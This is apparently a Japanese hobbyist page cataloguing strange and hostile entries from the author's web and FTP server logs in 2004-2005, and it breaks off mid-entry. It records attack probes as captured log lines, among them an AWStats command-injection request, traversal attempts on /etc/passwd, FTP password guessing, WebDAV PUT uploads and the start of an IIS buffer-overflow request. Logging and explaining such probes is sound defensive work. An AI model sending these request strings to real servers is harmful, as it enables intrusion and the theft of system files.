I&U Home > うにまま(仮) ・  謎ログの友 ・  パスワードコレクション ・  FormMail Scanners

謎ログ

ハッカー・不正侵入にはウイルスバスター2004で対策!
全国のアルバイト情報 - 楽天仕事市場

  • ここには2004年と2005年のログがあります。
  • 2006年の謎ログはここにあります。
  • 2003年の謎ログはlogwatch03.htmlに、2002年以前の謎ログはlogwatch02.htmlにあります。
  • 謎ログをカテゴリに分類してみました。
  • [all] [apache] [exploit] [ftp] [robot] [webalizer] [SEO_SPAM] [others]

    AWStats の脆弱性を探るアクセス 

    200.203.166.61 - - [05/Feb/2005:17:56:57 +0900] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" 
    200.203.166.61 - - [05/Feb/2005:17:57:08 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" 
    200.203.166.61 - - [05/Feb/2005:18:12:05 +0900] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" 
    200.203.166.61 - - [05/Feb/2005:18:12:16 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" 
    

    "\t\x15\x10" 

    62.117.66.2 - - [08/Jan/2005:07:23:52 +0900] "\t\x15\x10" 400 - "-" "-" 
    62.117.66.2 - - [08/Jan/2005:07:23:52 +0900] "\t\x15\x10" 400 - "-" "-" 
    62.117.66.2 - - [08/Jan/2005:07:23:52 +0900] "\t\x15\x10" 400 - "-" "-" 
    62.117.66.2 - - [08/Jan/2005:07:23:53 +0900] "\t\x15\x10" 400 - "-" "-" 
    

    2005年初の侵入未遂は蛭 

    Jan  1 04:36:21 myhost ftpd[10504]: FTPD: connection from 210.121.141.150 at Sat Jan  1 04:36:21 2005
    Jan  1 04:36:21 myhost ftpd[10504]: <--- 220 
    Jan  1 04:36:21 myhost ftpd[10504]: myhost FTP server () ready.
    Jan  1 04:36:22 myhost ftpd[10504]: FTPD: command: user leech^M
    Jan  1 04:36:22 myhost ftpd[10504]: <--- 331 
    Jan  1 04:36:22 myhost ftpd[10504]: Password required for leech.
    Jan  1 04:36:22 myhost ftpd[10504]: FTPD: command: PASS 
    Jan  1 04:36:22 myhost ftpd[10504]: <--- 530 
    Jan  1 04:36:22 myhost ftpd[10504]: Login incorrect.
    Jan  1 04:36:23 myhost ftpd[10504]: FTPD: command: user test^M
    Jan  1 04:36:23 myhost ftpd[10504]: <--- 331 
    Jan  1 04:36:23 myhost ftpd[10504]: Password required for test.
    Jan  1 04:36:24 myhost ftpd[10504]: FTPD: command: PASS 
    Jan  1 04:36:24 myhost ftpd[10504]: <--- 530 
    Jan  1 04:36:24 myhost ftpd[10504]: Login incorrect.
    Jan  1 04:36:24 myhost ftpd[10504]: FTPD: command: user games^M
    Jan  1 04:36:24 myhost ftpd[10504]: <--- 331 
    Jan  1 04:36:24 myhost ftpd[10504]: Password required for games.
    Jan  1 04:36:24 myhost ftpd[10504]: FTPD: command: PASS 
    Jan  1 04:36:24 myhost ftpd[10504]: <--- 530 
    Jan  1 04:36:24 myhost ftpd[10504]: Login incorrect.
    Jan  1 04:36:24 myhost ftpd[10504]: games (bogus) LOGIN FAILED [from 210.121.141.150]
    

    中途半端 

    66.118.149.82 - - [25/Dec/2004:09:53:37 +0900] "GET http://6thandizard.org/adipex/side/effects/ HTTP/1.1" 404 304 "http://6thandizard.org/adipex/side/effects/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:09:22:01 +0900] "GET http://866carrier.org/anxiety/alprazolam/ HTTP/1.1" 404 303 "http://866carrier.org/anxiety/alprazolam/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:08:46:57 +0900] "GET http://99xis.org/ambien/prescription/ HTTP/1.1" 404 304 "http://99xis.org/ambien/prescription/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:08:12:24 +0900] "GET http://99xmusic.org/bontril/side/effects/ HTTP/1.1" 404 305 "http://99xmusic.org/bontril/side/effects/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:07:38:18 +0900] "GET http://9thalarm.com/carisprodol/online/ HTTP/1.1" 404 303 "http://9thalarm.com/carisprodol/online/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:07:02:53 +0900] "GET http://a1-credit-card-acceptance.com/cialis/dosage/ HTTP/1.1" 404 298 "http://a1-credit-card-acceptance.com/cialis/dosage/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:06:27:19 +0900] "GET http://aaronarte.com/cheap/diazepam/ HTTP/1.1" 404 299 "http://aaronarte.com/cheap/diazepam/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:05:52:16 +0900] "GET http://abcplumbingorg.com/ephedra/effects/ HTTP/1.1" 404 300 "http://abcplumbingorg.com/ephedra/effects/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:05:17:18 +0900] "GET http://aberdeenproball.com/hydrocodone/apap/ HTTP/1.1" 404 301 "http://aberdeenproball.com/hydrocodone/apap/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:04:40:22 +0900] "GET http://abrahamfund.com/levitra/ads/ HTTP/1.1" 404 296 "http://abrahamfund.com/levitra/ads/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:04:04:30 +0900] "GET http://actorsagentlocator.com/online/cheap/phentermine/ HTTP/1.1" 404 309 "http://actorsagentlocator.com/online/cheap/phentermine/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:03:29:09 +0900] "GET http://actorsonlineagency.com/info/protonix/ HTTP/1.1" 404 298 "http://actorsonlineagency.com/info/protonix/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:02:53:59 +0900] "GET http://acucomit.com/rohypnol/ingredients/ HTTP/1.1" 404 305 "http://acucomit.com/rohypnol/ingredients/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:02:20:05 +0900] "GET http://ads-juke.com/soma/san/diego/ HTTP/1.1" 404 299 "http://ads-juke.com/soma/san/diego/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    66.118.149.82 - - [25/Dec/2004:01:46:12 +0900] "GET http://airlines-inc.com/tramadol/overnight/ HTTP/1.1" 404 303 "http://airlines-inc.com/tramadol/overnight/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    

    AdminShop Spammer? 

    65.75.134.180 - - [05/Dec/2004:14:46:30 +0900] "GET /~gggg/org.html HTTP/1.1" 200 2005 "http://www.xopy.com/friendslinks.php" "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U)"
    65.75.134.180 - - [07/Dec/2004:05:45:28 +0900] "GET /~gggg/gtop.html HTTP/1.1" 200 2480 "http://www.xopy.com/friendslinks.php" "Mozilla/5.0 (compatible; Konqueror/3.0.0-10; Linux)"
    65.75.134.180 - - [16/Dec/2004:08:49:43 +0900] "GET /~gggg/org.html HTTP/1.1" 200 2005 "http://www.xopy.com/friendslinks.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    205.209.177.70 - - [16/Dec/2004:11:06:19 +0900] "GET /~gggg/org.html HTTP/1.1" 200 2005 "http://www.xopy.com/friendslinks.php" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux; i686)"
    65.75.134.180 - - [16/Dec/2004:22:41:37 +0900] "GET /~gggg/whatgtop.html HTTP/1.1" 200 10808 "http://www.xopy.com/friendslinks.php" "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)"
    65.75.134.180 - - [16/Dec/2004:22:42:31 +0900] "GET /~gggg/whatgtop.html HTTP/1.1" 200 10808 "http://www.xopy.com/friendslinks.php" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
    65.75.134.180 - - [16/Dec/2004:23:14:46 +0900] "GET /~gggg/org.html HTTP/1.1" 200 2005 "http://www.xopy.com/friendslinks.php" "Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 95)"
    65.75.134.180 - - [16/Dec/2004:23:15:41 +0900] "GET /~gggg/org.html HTTP/1.1" 200 2005 "http://www.xopy.com/friendslinks.php" "Mozilla/4.5 (compatible; iCab 2.9.1; Macintosh; U; PPC; Mac OS X)"
    205.209.177.70 - - [18/Dec/2004:00:54:26 +0900] "GET /~gggg/func.html HTTP/1.1" 200 5317 "http://www.xopy.com/friendslinks.php" "Mozilla/4.0 (compatible; MSIE 5.01; AOL 4.0; Windows 98)"
    65.75.134.180 - - [21/Dec/2004:22:43:07 +0900] "GET /~gggg/func.html HTTP/1.1" 200 5317 "http://www.xopy.com/friendslinks.php" "Mozilla/5.0 (compatible; Konqueror/2.2.2-2; Linux)"
    65.75.134.180 - - [22/Dec/2004:02:53:07 +0900] "GET /~gggg/refs.html HTTP/1.1" 200 0 "http://www.xopy.com/friendslinks.php" "Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)"
    

    Web Link Validator 4.0 

    198.151.217.26 - - [02/Dec/2004:02:02:30 +0900] "HEAD /~ppp/pppkey.html HTTP/1.0" 200 0 "http://www.weblinkvalidator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Web Link Validator 4.0"
    198.151.217.26 - - [04/Dec/2004:02:34:56 +0900] "HEAD /~ppp/pppkey.html HTTP/1.0" 200 0 "http://www.weblinkvalidator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Web Link Validator 4.0"
    198.151.217.26 - - [07/Dec/2004:01:32:53 +0900] "HEAD /~ppp/pppkey.html HTTP/1.0" 200 0 "http://www.weblinkvalidator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Web Link Validator 4.0"
    198.151.217.26 - - [08/Dec/2004:03:16:37 +0900] "HEAD /~ppp/pppkey.html HTTP/1.0" 200 0 "http://www.weblinkvalidator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Web Link Validator 4.0"
    198.151.217.26 - - [09/Dec/2004:00:18:45 +0900] "HEAD /~ppp/pppkey.html HTTP/1.0" 200 0 "http://www.weblinkvalidator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Web Link Validator 4.0"
    198.151.217.26 - - [09/Dec/2004:23:42:15 +0900] "HEAD /~ppp/pppkey.html HTTP/1.0" 200 0 "http://www.weblinkvalidator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Web Link Validator 4.0"
    198.151.217.26 - - [15/Dec/2004:05:58:39 +0900] "HEAD /~ppp/pppkey.html HTTP/1.0" 200 0 "http://www.weblinkvalidator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Web Link Validator 4.0"
    

    e-SocietyRobot 

    133.163.194.50 - - [13/Dec/2004:23:07:26 +0900] "GET /~ HTTP/1.1" 404 285 "-" "e-SocietyRobot(http://www.yama.info.waseda.ac.jp/~yamana/es/)" 
    133.163.194.50 - - [13/Dec/2004:23:07:36 +0900] "GET /~genom HTTP/1.1" 404 290 "-" "e-SocietyRobot(http://www.yama.info.waseda.ac.jp/~yamana/es/)"
    133.163.194.50 - - [13/Dec/2004:23:07:46 +0900] "GET /~ge HTTP/1.1" 404 287 "-" "e-SocietyRobot(http://www.yama.info.waseda.ac.jp/~yamana/es/)"
    133.163.194.50 - - [13/Dec/2004:23:07:56 +0900] "GET /~geno HTTP/1.1" 404 289 "-" "e-SocietyRobot(http://www.yama.info.waseda.ac.jp/~yamana/es/)" 
    133.163.194.50 - - [13/Dec/2004:23:08:06 +0900] "GET /~gen HTTP/1.1" 404 288 "-" "e-SocietyRobot(http://www.yama.info.waseda.ac.jp/~yamana/es/)" 
    133.163.194.50 - - [13/Dec/2004:23:10:21 +0900] "GET /~g HTTP/1.1" 404 286 "-" "e-SocietyRobot(http://www.yama.info.waseda.ac.jp/~yamana/es/)"
    

    referrer に "../" 

    221.148.44.82 - - [03/Dec/2004:39 +0900] "HEAD /~gggg-old/gggg.html HTTP/1.1" 200 0 "../~gggg/gggg.html" "W3CRobot/5.4.0 libwww/5.4.0" 
    221.148.44.82 - - [07/Dec/2004:19 +0900] "HEAD /~ppp/ppp-j.html HTTP/1.1" 200 0 "../" "W3CRobot/5.4.0 libwww/5.4.0" 
    221.148.44.82 - - [07/Dec/2004:20 +0900] "HEAD /~ppp/whatppp.html HTTP/1.1" 200 0 "../" "W3CRobot/5.4.0 libwww/5.4.0" 
    221.148.44.82 - - [07/Dec/2004:20 +0900] "HEAD /~ppp/ppphelp.html HTTP/1.1" 200 0 "../" "W3CRobot/5.4.0 libwww/5.4.0" 
    221.148.44.82 - - [07/Dec/2004:20 +0900] "HEAD /~ppp/pppkey.html HTTP/1.1" 200 0 "../" "W3CRobot/5.4.0 libwww/5.4.0" 
    221.148.44.82 - - [07/Dec/2004:20 +0900] "HEAD /~ppp/pppseqblt.html HTTP/1.1" 200 0 "../" "W3CRobot/5.4.0 libwww/5.4.0" 
    221.148.44.82 - - [07/Dec/2004:20 +0900] "HEAD /~ppp/ppp_input/pppsubmit.html HTTP/1.1" 200 0 "../../" "W3CRobot/5.4.0 libwww/5.4.0" 
    

    "PUT /kateam.htm HTTP/1.0" 

    198.82.97.145 - - [06/Oct/2004:12:52:02 +0900] "PUT /kateam.htm HTTP/1.0" 405 305 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
    82.154.129.251 - - [08/Oct/2004:04:35:29 +0900] "PUT /index.htm HTTP/1.0" 405 301 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" 
    81.193.225.177 - - [08/Oct/2004:16:55:27 +0900] "PUT /www.arplhmd.cjb.net_084958 HTTP/1.0" 405 318 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
    82.174.140.61 - - [24/Oct/2004:09:18:18 +0900] "PUT /images/webal.asp HTTP/1.0" 405 311 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" 
    82.174.140.61 - - [24/Oct/2004:09:38:35 +0900] "PUT /shez.txt HTTP/1.0" 405 303 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
    81.91.144.250 - - [24/Oct/2004:09:53:42 +0900] "PUT /ihs.htm HTTP/1.0" 405 302 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
    217.170.241.1 - - [25/Oct/2004:02:01:46 +0900] "PUT /nap.html HTTP/1.0" 405 303 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
    217.170.241.1 - - [25/Oct/2004:02:34:24 +0900] "PUT /nap.txt HTTP/1.0" 405 302 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
    200.181.211.98 - - [06/Nov/2004:00:51:02 +0900] "PUT /dnt.htm HTTP/1.0" 405 299 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
    200.181.211.98 - - [06/Nov/2004:01:36:51 +0900] "PUT /denet.htm HTTP/1.0" 405 301 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
    

    "HEAD /afjldasjflas.txt" 

    	
    222.122.15.190 - - [01/Nov/2004:23:41:56 +0900] "HEAD /afjldasjflas.txt HTTP/1.0" 404 0 "-" "Talkro Web-Shot/1.0 (E-mail: webshot@daumsoft.com, Home: http://222.122.15.190/webshot)"
    222.122.15.190 - - [02/Nov/2004:10:49:54 +0900] "HEAD /afjldasjflas.txt HTTP/1.0" 404 0 "-" "Talkro Web-Shot/1.0 (E-mail: webshot@daumsoft.com, Home: http://222.122.15.190/webshot)"
    222.122.15.190 - - [04/Nov/2004:04:56:18 +0900] "HEAD /afjldasjflas.txt HTTP/1.0" 404 0 "-" "Talkro Web-Shot/1.0 (E-mail: webshot@daumsoft.com, Home: http://222.122.15.190/webshot)"
    222.122.15.190 - - [04/Nov/2004:14:17:37 +0900] "HEAD /afjldasjflas.txt HTTP/1.0" 404 0 "-" "Talkro Web-Shot/1.0 (E-mail: webshot@daumsoft.com, Home: http://222.122.15.190/webshot)"
    

    GET /bbs/viewpro.php 

    lj1174.inktomisearch.com - - [29/Oct/2004:13:14:22 +0900] "GET /robots.txt HTTP/1.0" 200 41 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
    lj1102.inktomisearch.com - - [29/Oct/2004:13:14:23 +0900] "GET /bbs/viewpro.php?username=mirrorice&sid=SilY9d73 HTTP/1.0" 302 211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
    

    "GET /ccbill/whereami.cgi HTTP/1.0" 

    68.56.141.225 - - [29/Aug/2004:01:41:00 +0900] "GET /ccbill/whereami.cgi HTTP/1.0" 404 291 "-" "-"
    

    12階層のぼる 

    208.179.55.251 - - [24/Aug/2004:08:34:54 +0900] "GET /~ppp/cgi-bin/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 402 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:34:55 +0900] "GET /~ppp/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 394 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:34:57 +0900] "GET /~ppp/cgi-bin/PPP/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 406 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:34:57 +0900] "GET /~ppp/cgi-bin/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 402 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:34:58 +0900] "GET /~ppp/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 394 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:36:40 +0900] "GET /~ppp/cgi-bin/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 402 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:36:40 +0900] "GET /~ppp/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 394 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:36:42 +0900] "GET /~ppp/cgi-bin/PPP/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 406 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:36:43 +0900] "GET /~ppp/cgi-bin/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 402 "-" "-" 
    208.179.55.251 - - [24/Aug/2004:08:36:43 +0900] "GET /~ppp/../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 394 "-" "-" 
    

    踏み台にされている人たち 

    80.206.246.195 - - [07/Aug/2004:05:59:50 +0900] "POST /cgi-bin/friends/friends.cgi HTTP/1.1" 404 308 "http://mydomain.xxx.xxx.xxx/" "-" 
    153.110.132.10 - - [07/Aug/2004:05:59:51 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 288 "http://mydomain.xxx.xxx.xxx/" "-"
    211.46.75.189 - - [07/Aug/2004:05:59:52 +0900] "POST /cgi-bin/contact.cgi HTTP/1.0" 404 288 "http://mydomain.xxx.xxx.xxx/" "-" 
    209.50.252.95 - - [07/Aug/2004:05:59:53 +0900] "POST /cgi-bin/mailform.pl HTTP/1.1" 404 300 "http://mydomain.xxx.xxx.xxx/" "-" 
    195.53.31.35 - - [07/Aug/2004:05:59:55 +0900] "POST /cgi-bin/formmail.cgi HTTP/1.1" 404 301 "http://mydomain.xxx.xxx.xxx/" "-" 
    216.72.28.100 - - [07/Aug/2004:06:00:12 +0900] "POST http://mydomain.xxx.xxx.xxx/cgi-bin/FormMail.pl HTTP/1.0" 404 288 "http://mydomain.xxx.xxx.xxx/" "-" 
    129.174.163.41 - - [07/Aug/2004:06:00:13 +0900] "POST /mail.cgi HTTP/1.0" 403 281 "http://mydomain.xxx.xxx.xxx/" "-" 
    65.100.168.58 - - [07/Aug/2004:06:00:59 +0900] "POST /cgi-bin/FormMail.pl HTTP/1.0" 404 288 "http://mydomain.xxx.xxx.xxx/" "-" 
    

    openwebmail があるかどうか試している 

    212.182.78.78 - - [03/Aug/2004:00:30:41 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    212.182.78.78 - - [03/Aug/2004:00:30:41 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    212.182.78.78 - - [03/Aug/2004:00:30:42 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    212.182.78.78 - - [03/Aug/2004:00:30:43 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    212.182.78.78 - - [03/Aug/2004:00:30:43 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    

    本格的に夏休みに入ってきたのか、イタズラが多くなってきた 

    pwrchute でログインを試みる攻撃 

    Jul 23 02:13:59 myhost ftpd[11670]: FTPD: connection from p5087DC82.dip.t-dialin.net at Fri Jul 23 02:13:59 2004
    Jul 23 02:13:59 myhost ftpd[11670]: <--- 220 
    Jul 23 02:13:59 myhost ftpd[11670]: myhost FTP server () ready.
    Jul 23 02:13:59 myhost ftpd[11670]: FTPD: command: USER pwrchute^M
    Jul 23 02:13:59 myhost ftpd[11670]: <--- 331 
    Jul 23 02:13:59 myhost ftpd[11670]: Password required for pwrchute.
    Jul 23 02:13:59 myhost ftpd[11670]: FTPD: command: PASS 
    Jul 23 02:13:59 myhost ftpd[11670]: <--- 530 
    Jul 23 02:13:59 myhost ftpd[11670]: Login incorrect.
    Jul 23 02:14:00 myhost ftpd[11670]: <--- 221 
    Jul 23 02:14:00 myhost ftpd[11670]: You could at least say goodbye.
    

    Yahooの怪しいロボット 

    66.196.90.96 - - [20/Jul/2004:10:07:07 +0900] "GET /campus.htm HTTP/1.0" 404 282 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
    66.196.90.246 - - [20/Jul/2004:10:07:19 +0900] "GET /jan.htm HTTP/1.0" 404 279 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
    66.196.90.54 - - [20/Jul/2004:11:21:48 +0900] "GET /resale.htm HTTP/1.0" 404 282 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
    66.196.90.225 - - [20/Jul/2004:13:29:12 +0900] "GET /mainarca.htm HTTP/1.0" 404 284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 
    66.196.90.112 - - [20/Jul/2004:15:14:44 +0900] "GET /newsflashjustin.htm HTTP/1.0" 404 288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
    66.196.90.115 - - [20/Jul/2004:16:45:13 +0900] "GET /work.htm HTTP/1.0" 404 277 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 
    66.196.90.38 - - [20/Jul/2004:16:45:26 +0900] "GET /hello.php HTTP/1.0" 404 278 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
    

    "GET /sjdif.exe" 

    66.194.6.73 - - [02/Jul/2004:08:04:24 +0900] "GET /sjdif.exe HTTP/1.1" 404 290 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc4; i686 Linux; 20020526)"
    66.194.6.74 - - [02/Jul/2004:08:20:56 +0900] "GET /sjdif.exe HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312463)" 
    66.194.6.72 - - [02/Jul/2004:08:56:21 +0900] "GET /sjdif.exe HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312462)" 
    

    間違えすぎ 

    133.11.224.2 - - [09/Jun/2004:15:37:20 +0900] "GET /+ACU-7Eggggg/cgi-bin/mas.pl.cgi?id+AD0-CAB49923.1 HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 
    133.11.224.2 - - [09/Jun/2004:15:39:35 +0900] "GET /+ACU-7Eggggg/cgi-bin/mmm.pl.cgi?id+AD0-AAL81031.1 HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    

    yahooへの変なアクセス 

    67.172.181.95 - - [05/Jun/2004:06:02:19 +0900] "GET http://e11.member.ukl.yahoo.com/????????????????????????????.&login=ann_127&passwd=123&.done=http://edit.yahoo.com/config/change_pw?.src=&.opw=123&.pw1=123&.pw2=123&.commit=Save\" ' HTTP/1.0" 400 377 "-" "-" 
    67.172.181.95 - - [05/Jun/2004:06:05:33 +0900] "GET http://e16.member.ukl.yahoo.com/????????????????????????????.&login=ann_1980_99&passwd=123&.done=http://edit.yahoo.com/config/change_pw?.src=&.opw=123&.pw1=123&.pw2=123&.commit=Save\" ' HTTP/1.0" 400 377 "-" "-" 
    67.172.181.95 - - [05/Jun/2004:06:08:41 +0900] "GET http://e1.member.ukl.yahoo.com/????????????????????????????.&login=ann_0325&passwd=123&.done=http://edit.yahoo.com/config/change_pw?.src=&.opw=123&.pw1=123&.pw2=123&.commit=Save\" ' HTTP/1.0" 400 377 "-" "-"
    

    変な Referer 残すから 

    67.18.55.52 - - [04/May/2004:23:49:19 +0900] "GET /pppkey.html HTTP/1.0" 404 280 "Mixcat - The Search Engine" "Felix - Mixcat Crawler (+http://mixcat.com)" 
    67.18.55.52 - - [04/May/2004:23:49:21 +0900] "GET /pppseqblt.html HTTP/1.0" 404 283 "Mixcat - The Search Engine" "Felix - Mixcat Crawler (+http://mixcat.com)"
    
    64.68.82.169 - - [11/May/2004:13:55:03 +0900] "GET /~ppp/usage/Mixcat%20-%20The%20Search%20Engine HTTP/1.0" 404 306 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
    

    そんなに探さなくても・・・ないものはないんだから 

    May 10 05:20:57 myhost ftpd[20164]: FTPD: connection from 65.199.244.92 at Mon May 10 05:20:57 2004
    May 10 05:20:57 myhost ftpd[20164]: <--- 220 
    May 10 05:20:57 myhost ftpd[20164]: myhost FTP server () ready.
    May 10 05:20:59 myhost ftpd[20164]: FTPD: command: USER anonymous^M
    May 10 05:20:59 myhost ftpd[20164]: <--- 331 
    May 10 05:20:59 myhost ftpd[20164]: Guest login ok, send ident as password.
    May 10 05:21:01 myhost ftpd[20164]: FTPD: command: PASS IEUser@^M
    May 10 05:21:01 myhost ftpd[20164]: <--- 230 
    May 10 05:21:01 myhost ftpd[20164]: Guest login ok, access restrictions apply.
    May 10 05:21:03 myhost ftpd[20164]: FTPD: command: TYPE I^M
    May 10 05:21:03 myhost ftpd[20164]: <--- 200 
    May 10 05:21:03 myhost ftpd[20164]: Type set to I.
    May 10 05:21:05 myhost ftpd[20164]: FTPD: command: PASV^M
    May 10 05:21:05 myhost ftpd[20164]: <--- 227 
    May 10 05:21:05 myhost ftpd[20164]: Entering Passive Mode (xxx,xxx,xxx,xxx,235,3)
    May 10 05:21:10 myhost ftpd[20164]: FTPD: command: SIZE /favicon.ico^M
    May 10 05:21:10 myhost ftpd[20164]: <--- 500 
    May 10 05:21:10 myhost ftpd[20164]: 'SIZE /favicon.ico': command not understood.
    May 10 05:21:12 myhost ftpd[20164]: FTPD: command: RETR /favicon.ico^M
    May 10 05:21:12 myhost ftpd[20164]: <--- 550 
    May 10 05:21:12 myhost ftpd[20164]: /favicon.ico: No such file or directory.
    May 10 05:21:14 myhost ftpd[20164]: FTPD: command: CWD /favicon.ico^M
    May 10 05:21:14 myhost ftpd[20164]: <--- 550 
    May 10 05:21:14 myhost ftpd[20164]: /favicon.ico: No such file or directory.
    May 10 05:36:14 myhost ftpd[20164]: <--- 421 
    May 10 05:36:14 myhost ftpd[20164]: Timeout (900 seconds): closing control connection.
    May 10 05:36:14 myhost ftpd[20164]: FTPD: User ftp timed out after 900 seconds at Mon May 10 05:36:14 2004
    

    IIS WebDAV を狙った攻撃 

    % grep "SEARCH \/\\" access_log | cut -b1-80
    218.66.213.215 - - [04/Apr/2004:23:31:43 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x0
